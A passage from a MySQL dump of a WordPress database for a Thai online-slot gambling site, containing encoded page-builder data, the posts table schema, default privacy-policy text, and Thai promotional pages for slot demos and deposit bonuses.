x1MGUyMlx1MGUxNVx1MGUyM1x1MGUwN1x1MGUwMVx1MGUzMVx1MGUxYVx1MGUxOFx1MGUxOVx1MGUzMlx1MGUwNFx1MGUzMlx1MGUyM1x1MGU0MVx1MGUyNVx1MGUzMFx1MGUxY1x1MGUzOVx1MGU0OVx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxYVx1MGUyM1x1MGUzNFx1MGUwMVx1MGUzMlx1MGUyM1x1MGUyN1x1MGUyZFx1MGU0MFx1MGUyNVx1MGUxN1x1MGU0M1x1MGUxOVx1MGUxYlx1MGUyM1x1MGUzMFx1MGU0MFx1MGUxN1x1MGUyOFx1MGU0NFx1MGUxN1x1MGUyMiBcdTBlMGJcdTBlMzZcdTBlNDhcdTBlMDdcdTBlMjNcdTBlMzBcdTBlMWFcdTBlMWFcdTBlMTlcdTBlMzVcdTBlNDlcdTBlMTZcdTBlMzlcdTBlMDFcdTBlMTlcdTBlMzNcdTBlNDBcdTBlMDJcdTBlNDlcdTBlMzJcdTBlMDhcdTBlMzJcdTBlMDEgVVNBIFx1MGU0MVx1MGUyNVx1MGUzMFx1MGU0NFx1MGUxNFx1MGU0OVx1MGUyM1x1MGUzMVx1MGUxYVx1MGUwMVx1MGUzMlx1MGUyM1x1MGUxYlx1MGUyM1x1MGUzMVx1MGUxYVx1MGU0MVx1MGUxNVx1MGU0OFx1MGUwN1x1MGU0M1x1MGUyYlx1MGU0OVx1MGU0MFx1MGUyYlx1MGUyMVx1MGUzMlx1MGUzMFx1MGUwMVx1MGUzMVx1MGUxYVx1MGUwMVx1MGUzMlx1MGUyM1x1MGU0M1x1MGUwYVx1MGU0OVx1MGUwN1x1MGUzMlx1MGUxOVx1MGUwMlx1MGUyZFx1MGUwN1x1MGUxY1x1MGUzOVx1MGU0OVx1MGU0MFx1MGUyNVx1MGU0OFx1MGUxOVx1MGU0NFx1MGUxN1x1MGUyMlx1MGU0Mlx1MGUxNFx1MGUyMlx1MGU0MFx1MGUwOVx1MGUxZVx1MGUzMlx1MGUzMDxcL3A+PHAgZGF0YS1zdGFydD1cIjI1MzNcIiBkYXRhLWVuZD1cIjI1NzVcIj48c3BhbiBzdHlsZT1cInRleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lO1wiPjxzdHJvbmc+XHUwZTA4XHUwZTM4XHUwZTE0XHUwZTQwXHUwZTE0XHUwZTQ4XHUwZTE5XHUwZTAyXHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTFkXHUwZTMyXHUwZTAxXHUwZTE2XHUwZTJkXHUwZTE5XHUwZTJkXHUwZTJkXHUwZTQyXHUwZTE1XHUwZTQ5XHUwMGEwPFwvc3Ryb25nPjxcL3NwYW4+PGI+PHU+QU1CMTg8XC91PjxcL2I+PFwvcD48dWw+PGxpIGRhdGEtc3RhcnQ9XCIyNTc4XCIgZGF0YS1lbmQ9XCIyNjY4XCI+PHN0cm9uZyBkYXRhLXN0YXJ0PVwiMjU3OFwiIGRhdGEtZW5kPVwiMjYxN1wiPlx1MGU0MFx1MGUwYVx1MGUzN1x1MGU0OFx1MGUyZFx1MGUyMVx1MGUxNVx1MGU0OFx1MGUyZFx1MGU0Mlx1MGUxNFx1MGUyMlx1MGUxNVx1MGUyM1x1MGUwN1x1MGUwMVx1MGUzMVx1MGUxYVx1MGUxOFx1MGUxOVx1MGUzMlx1MGUwNFx1MGUzMlx1MGUyM1x1MGUyYlx1MGUyNVx1MGUzMVx1MGUwMVx1MGUxN1x1MGUzOFx1MGUwMVx1MGU0MVx1MGUyYlx1MGU0OFx1MGUwNzxcL3N0cm9uZz4gXHUwZTQwXHUwZTBhXHUwZTQ4XHUwZTE5IFx1MGUwMVx1MGUyYVx1MGUzNFx1MGUwMVx1MGUyM1x1MGU0NFx1MGUxN1x1MGUyMiwgXHUwZTAxXHUwZTIzXHUwZTM4XHUwZTA3XHUwZTQwXHUwZTE3XHUwZTFlLCBcdTBlNDRcdTBlMTdcdTBlMjJcdTBlMWVcdTBlMzJcdTBlMTNcdTBlMzRcdTBlMGFcdTBlMjJcdTBlNGMsIFx1MGUwMVx1MGUyM1x1MGUzOFx1MGUwN1x1MGUyOFx1MGUyM1x1MGUzNVx1MGUyZiBcdTBlMmZcdTBlMjVcdTBlMmY8XC9saT48bGkgZGF0YS1zdGFydD1cIjI2NzFcIiBkYXRhLWVuZD1cIjI3NTNcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCIyNjcxXCIgZGF0YS1lbmQ9XCIyNzA3XCI+XHUwZTIzXHUwZTJkXHUwZTA3XHUwZTIzXHUwZTMxXHUwZTFhIFRydWVNb25leSBXYWxsZXQgXHUwZTQwXHUwZTE1XHUwZTQ3XHUwZTIxXHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhPFwvc3Ryb25nPiBcdTBlNDBcdTBlMmJcdTBlMjFcdTBlMzJcdTBlMzBcdTBlMmFcdTBlMzNcdTBlMmJcdTBlMjNcdTBlMzFcdTBlMWFcdTBlMWNcdTBlMzlcdTBlNDlcdTBlNDBcdTBlMjVcdTBlNDhcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlNDRcdTBlMjFcdTBlNDhcdTBlMmFcdTBlMzBcdTBlMTRcdTBlMjdcdTBlMDFcdTBlNDNcdTBlMGFcdTBlNDlcdTBlMWFcdTBlMzFcdTBlMGRcdTBlMGFcdTBlMzVcdTBlMThcdTBlMTlcdTBlMzJcdTBlMDRcdTBlMzJcdTBlMjM8XC9saT48bGkgZGF0YS1zdGFydD1cIjI3NTZcIiBkYXRhLWVuZD1cIjI3OTZcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCIyNzU2XCIgZGF0YS1lbmQ9XCIyNzk0XCI+XHUwZTE1XHUwZTIzXHUwZTI3XHUwZTA4XHUwZTA4XHUwZTMxXHUwZTFhXHUwZTIyXHUwZTJkXHUwZTE0XHUwZTFkXHUwZTMyXHUwZTAxXHUwZTE3XHUwZTMxXHUwZTE5XHUwZTE3XHUwZTM1XHUwZTE0XHUwZTQ5XHUwZTI3XHUwZTIyIEFJIFx1MGUyZFx1MGUzMVx1MGUwOFx1MGUwOVx1MGUyM1x1MGUzNFx1MGUyMlx1MGUzMDxcL3N0cm9uZz48XC9saT48bGkgZGF0YS1zdGFydD1cIjI3OTlcIiBkYXRhLWVuZD1cIjI4NjZcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCIyNzk5XCIgZGF0YS1lbmQ9XCIyODQwXCI+XHUwZTIzXHUwZTMwXHUwZTFhXHUwZTFhXHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTFiXHUwZTI1XHUwZTJkXHUwZTE0XHUwZTIwXHUwZTMxXHUwZTIyXHUwZTJhXHUwZTM5XHUwZTA3XHUwZTJhXHUwZTM4XHUwZTE0XHUwZTQxXHUwZTFhXHUwZTFhIDIgXHUwZTBhXHUwZTMxXHUwZTQ5XHUwZTE5ICgyRkEpPFwvc3Ryb25nPiBcdTBlMWJcdTBlNDlcdTBlMmRcdTBlMDdcdTBlMDFcdTBlMzFcdTBlMTlcdTBlMDFcdTBlMzJcdTBlMjNcdTBlNDJcdTBlMDhcdTBlMjNcdTBlMDFcdTBlMjNcdTBlMjNcdTBlMjFcdTBlMDJcdTBlNDlcdTBlMmRcdTBlMjFcdTBlMzlcdTBlMjU8XC9saT48bGkgZGF0YS1zdGFydD1cIjI4NjlcIiBkYXRhLWVuZD1cIjI5MTlcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCIyODY5XCIgZGF0YS1lbmQ9XCIyOTAzXCI+XHUwZTQzXHUwZTBhXHUwZTQ5XHUwZTQwXHUwZTI3XHUwZTI1XHUwZTMyXHUwZTQwXHUwZTFlXHUwZTM1XHUwZTIyXHUwZTA3IDUgXHUwZTI3XHUwZTM0XHUwZTE5XHUwZTMyXHUwZTE3XHUwZTM1XHUwZTE1XHUwZTQ4XHUwZTJkXHUwZTIzXHUwZTMyXHUwZTIyXHUwZTAxXHUwZTMyXHUwZTIzPFwvc3Ryb25nPiBcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDdcdTBlMWRcdTBlMzJcdTBlMDFcdTBlNDFcdTBlMjVcdTBlMzBcdTBlMTZcdTBlMmRcdTBlMTk8XC9saT48XC91bD48YmxvY2txdW90ZT48cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIiBkYXRhLXN0YXJ0PVwiMjkyMVwiIGRhdGEtZW5kPVwiMzAxOFwiPjxlbT48c3BhbiBzdHlsZT1cImNvbG9yOiAjZmZjYzAwO1wiPjxiPlx1MGUxNFx1MGU0OVx1MGUyN1x1MGUyMlx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUxOVx1MGUzNVx1MGU0OSBBTUIxOCBcdTBlMDhcdTBlMzZcdTBlMDdcdTBlMDFcdTBlMjVcdTBlMzJcdTBlMjJcdTBlNDBcdTBlMWJcdTBlNDdcdTBlMTlcdTBlNDBcdTBlMjdcdTBlNDdcdTBlMWFcdTBlMWVcdTBlMTlcdTBlMzFcdTBlMTlcdTBlMTdcdTBlMzVcdTBlNDhcdTBlMTdcdTBlMzFcdTBlNDlcdTBlMDcgXHUyMDFjXHUwZTQwXHUwZTIzXHUwZTQ3XHUwZTI3XHUyMDFkIFx1MGU0MVx1MGUyNVx1MGUzMCBcdTIwMWNcdTBlNDBcdTBlMmFcdTBlMTZcdTBlMzVcdTBlMjJcdTBlMjNcdTIwMWQgXHUwZTE3XHUwZTM1XHUwZTQ4XHUwZTJhXHUwZTM4XHUwZTE0XHUwZTQzXHUwZTE5XHUwZTFiXHUwZTIzXHUwZTMwXHUwZTQwXHUwZTE3XHUwZTI4XHUwZTQ0XHUwZTE3XHUwZTIyXHUwZTQzXHUwZTE5XHUwZTAyXHUwZTEzXHUwZTMwXHUwZTE5XHUwZTM1XHUwZTQ5PFwvYj48XC9zcGFuPjxcL2VtPjxcL3A+PFwvYmxvY2txdW90ZT4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\",\"scripts\":[],\"styles\":[]}}'),(3591,442,'_elementor_page_assets','a:0:{}'),(3592,433,'_elementor_page_assets','a:0:{}'),(3593,440,'_elementor_page_assets','a:0:{}'),(3594,437,'_elementor_page_assets','a:0:{}'),(3595,436,'_elementor_page_assets','a:0:{}'),(3596,434,'_elementor_page_assets','a:0:{}'),(3597,439,'_elementor_page_assets','a:0:{}'),(3598,438,'_elementor_page_assets','a:0:{}');
/*!40000 ALTER TABLE `IwGJ28BV_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_posts`
--
DROP TABLE IF EXISTS `IwGJ28BV_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_posts` (
`ID` bigint unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint unsigned NOT NULL DEFAULT '0',
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`post_title` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`post_excerpt` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`post_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open',
`ping_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open',
`post_password` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`post_name` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`to_ping` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`pinged` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL,
`post_parent` bigint unsigned NOT NULL DEFAULT '0',
`guid` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`menu_order` int NOT NULL DEFAULT '0',
`post_type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
`comment_count` bigint NOT NULL DEFAULT '0',
PRIMARY KEY (`ID`),
KEY `post_name` (`post_name`(191)),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`),
KEY `type_status_author` (`post_type`,`post_status`,`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=444 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_posts`
--
LOCK TABLES `IwGJ28BV_posts` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_posts` DISABLE KEYS */;
INSERT INTO `IwGJ28BV_posts` VALUES (3,3,'2025-10-11 11:12:13','2025-10-11 11:12:13','<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Who we are</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: https://amb18b.com.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Comments</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Media</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Cookies</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select "Remember Me", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Embedded content from other websites</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Who we share your data with</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">How long we retain your data</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">What rights you have over your data</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Where your data is sent</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p>\n<!-- /wp:paragraph -->\n','Privacy Policy','','draft','closed','open','','privacy-policy','','','2025-10-11 11:12:13','2025-10-11 11:12:13','',0,'https://megabet333.biz/?page_id=3',0,'page','',0),(4,0,'2025-10-11 11:26:04','2025-10-11 11:26:04','<!-- wp:page-list /-->','Navigation','','publish','closed','closed','','navigation','','','2025-10-11 11:26:04','2025-10-11 11:26:04','',0,'https://megabet333.biz/?p=4',0,'wp_navigation','',0),(5,0,'2025-10-11 11:26:04','2025-10-11 11:26:04','<!-- wp:page-list /-->','Navigation','','publish','closed','closed','','navigation-2','','','2025-10-11 11:26:04','2025-10-11 11:26:04','',0,'https://megabet333.biz/?p=5',0,'wp_navigation','',0),(7,3,'2025-10-21 11:15:08','2025-10-21 11:15:08','','Default Kit','','publish','closed','closed','','default-kit','','','2026-02-26 19:28:30','2026-02-26 19:28:30','',0,'https://megabet333.biz/?p=7',0,'elementor_library','',0),(14,3,'2025-10-22 08:26:07','2025-10-22 08:26:07','{\"version\":3,\"isGlobalStylesUserThemeJSON\":true}','Custom Styles','','publish','closed','closed','','wp-global-styles-hello-elementor','','','2025-10-22 08:26:07','2025-10-22 08:26:07','',0,'https://megabet333.biz/wp-global-styles-hello-elementor/',0,'wp_global_styles','',0),(16,3,'2025-10-22 08:55:02','2025-10-22 08:55:02','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp\" alt=\"ทดลองเล่นสล็อต\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต AMB18 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น AMB18 คือแพลตฟอร์มสล็อตออนไลน์สุดฮอตที่กำลังมาแรงแบบหยุดไม่อยู่จุดเด่นคือเป็นเว็บตรงไม่ผ่านเอเย่นต์ ใช้ API แท้จาก USA ทำให้ระบบลื่น เสถียร ภาพคมชัดจัดเต็ม แถมจังหวะแตกกำลังดี โดนใจสายสล็อตยุคใหม่ที่ชอบอะไรไว ๆ ไม่ต้องรอนาน ในเว็บรวมเกมตัวท็อปจากหลายค่ายดังอัปเดตเกมใหม่ตลอดเวลา เข้าเล่นได้ทั้งมือถือและคอมพิวเตอร์ ไม่ว่าจะอยู่ที่ไหนก็หมุนได้สบาย สมัครยูสใหม่ก็มีโบนัสฟรีให้รับทุกวัน ยังมีโปรหมุนฟรีกับเครดิตคืนยอดเสียไว้ซัพพอร์ตสายลุยอีกด้วยเหมาะกับคนที่อยากได้ประสบการณ์เล่นสนุก ตื่นเต้นแบบจัดเต็มพร้อมระบบฝากถอนที่รวดเร็วทันใจทำรายการไม่ต้องรอให้เสียอารมณ์ ทั้งนี้ควรเล่นอย่างมีสติวางแผนการเงินให้ดี และเปิดให้บริการสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิงอย่างมีความรับผิดชอบต่อตัวเองในระยะยาว</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG-1.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-1-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming-1.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-1-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI-1.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-1-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-1.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-1-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic-1.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic-1.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-1-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','publish','closed','closed','','demoslot','','','2026-02-26 19:19:36','2026-02-26 19:19:36','',0,'https://megabet333.biz/?page_id=16',0,'page','',0),(17,3,'2025-10-22 08:45:49','2025-10-22 08:45:49','','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-22 08:45:49','2025-10-22 08:45:49','',16,'https://megabet333.biz/?p=17',0,'revision','',0),(18,3,'2025-10-22 08:56:02','2025-10-22 08:56:02','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2025-10-22 08:56:02','2025-10-22 08:56:02','',7,'https://megabet333.biz/?p=18',0,'revision','',0),(19,3,'2025-10-22 08:56:02','2025-10-22 08:56:02','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2025-10-22 08:56:02','2025-10-22 08:56:02','',7,'https://megabet333.biz/?p=19',0,'revision','',0),(20,3,'2025-10-22 08:58:47','2025-10-22 08:58:47','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2025-10-22 08:58:47','2025-10-22 08:58:47','',7,'https://megabet333.biz/?p=20',0,'revision','',0),(21,3,'2025-10-22 08:59:47','2025-10-22 08:59:47','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2025-10-22 08:59:47','2025-10-22 08:59:47','',7,'https://megabet333.biz/?p=21',0,'revision','',0),(22,3,'2025-10-22 09:02:05','2025-10-22 09:02:05','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2025-10-22 09:02:05','2025-10-22 09:02:05','',7,'https://megabet333.biz/?p=22',0,'revision','',0),(23,3,'2025-10-22 09:02:55','2025-10-22 09:02:55','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2025-10-22 09:02:55','2025-10-22 09:02:55','',7,'https://megabet333.biz/?p=23',0,'revision','',0),(24,3,'2025-10-22 09:03:22','2025-10-22 09:03:22','','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-22 09:03:22','2025-10-22 09:03:22','',16,'https://megabet333.biz/?p=24',0,'revision','',0),(25,3,'2025-10-22 09:03:22','2025-10-22 09:03:22','','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-22 09:03:22','2025-10-22 09:03:22','',16,'https://megabet333.biz/?p=25',0,'revision','',0),(26,3,'2025-10-22 09:03:22','2025-10-22 09:03:22','','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-22 09:03:22','2025-10-22 09:03:22','',16,'https://megabet333.biz/?p=26',0,'revision','',0),(27,3,'2025-10-22 09:21:01','2025-10-22 09:21:01','<h1>โปรโมชั่น AMB18 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นตัวตึงจาก AMB18 จัดเต็มเพื่อสายสล็อตตัวจริงกับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มพลังให้สนุกได้ตั้งแต่ก้าวแรกเติมไม่ต้องหนักก็มีสิทธิ์ลุ้นมันส์ได้เหมือนกัน แถมเงื่อนไขถอนไม่อั้น เล่นได้แบบไม่ต้องกั๊กรองรับครบทั้งสมาชิกใหม่และสมาชิกปัจจุบันใครอยู่ทีมไหนก็เข้าร่วมได้หมดรวมโปรสล็อตมาให้แบบจุก ๆ ทั้งโบนัสฝากครั้งแรก โบนัสฝากประจำ โปรคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาลที่สลับมาให้ร่วมสนุกตลอดปีอัปเดตใหม่เรื่อย ๆ ไม่มีเอาต์ ช่วยให้ทุกยอดเดิมพันดูคุ้มขึ้นแบบเห็นชัด เรื่องระบบก็หายห่วงเพราะฝากถอนอัตโนมัติทำรายการไวแบบไม่ต้องรอนาน ปลอดภัย มั่นใจได้ รองรับธนาคารชั้นนำ ใช้งานง่ายบนออนไลน์ ตอบโจทย์สายเอ็นเตอร์เทนที่อยากได้ทั้งความตื่นเต้นและความสะดวกในที่เดียว แต่ถึงโปรจะปังแค่ไหนก็อย่าลืมเล่นแบบมีสติวางแผนการเงินทุกครั้งก่อนเริ่มเดิมพัน และเปิดให้บริการสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อให้ความสนุกมาคู่กับความรับผิดชอบและความปลอดภัยแบบจริงจัง</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-AMB18-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 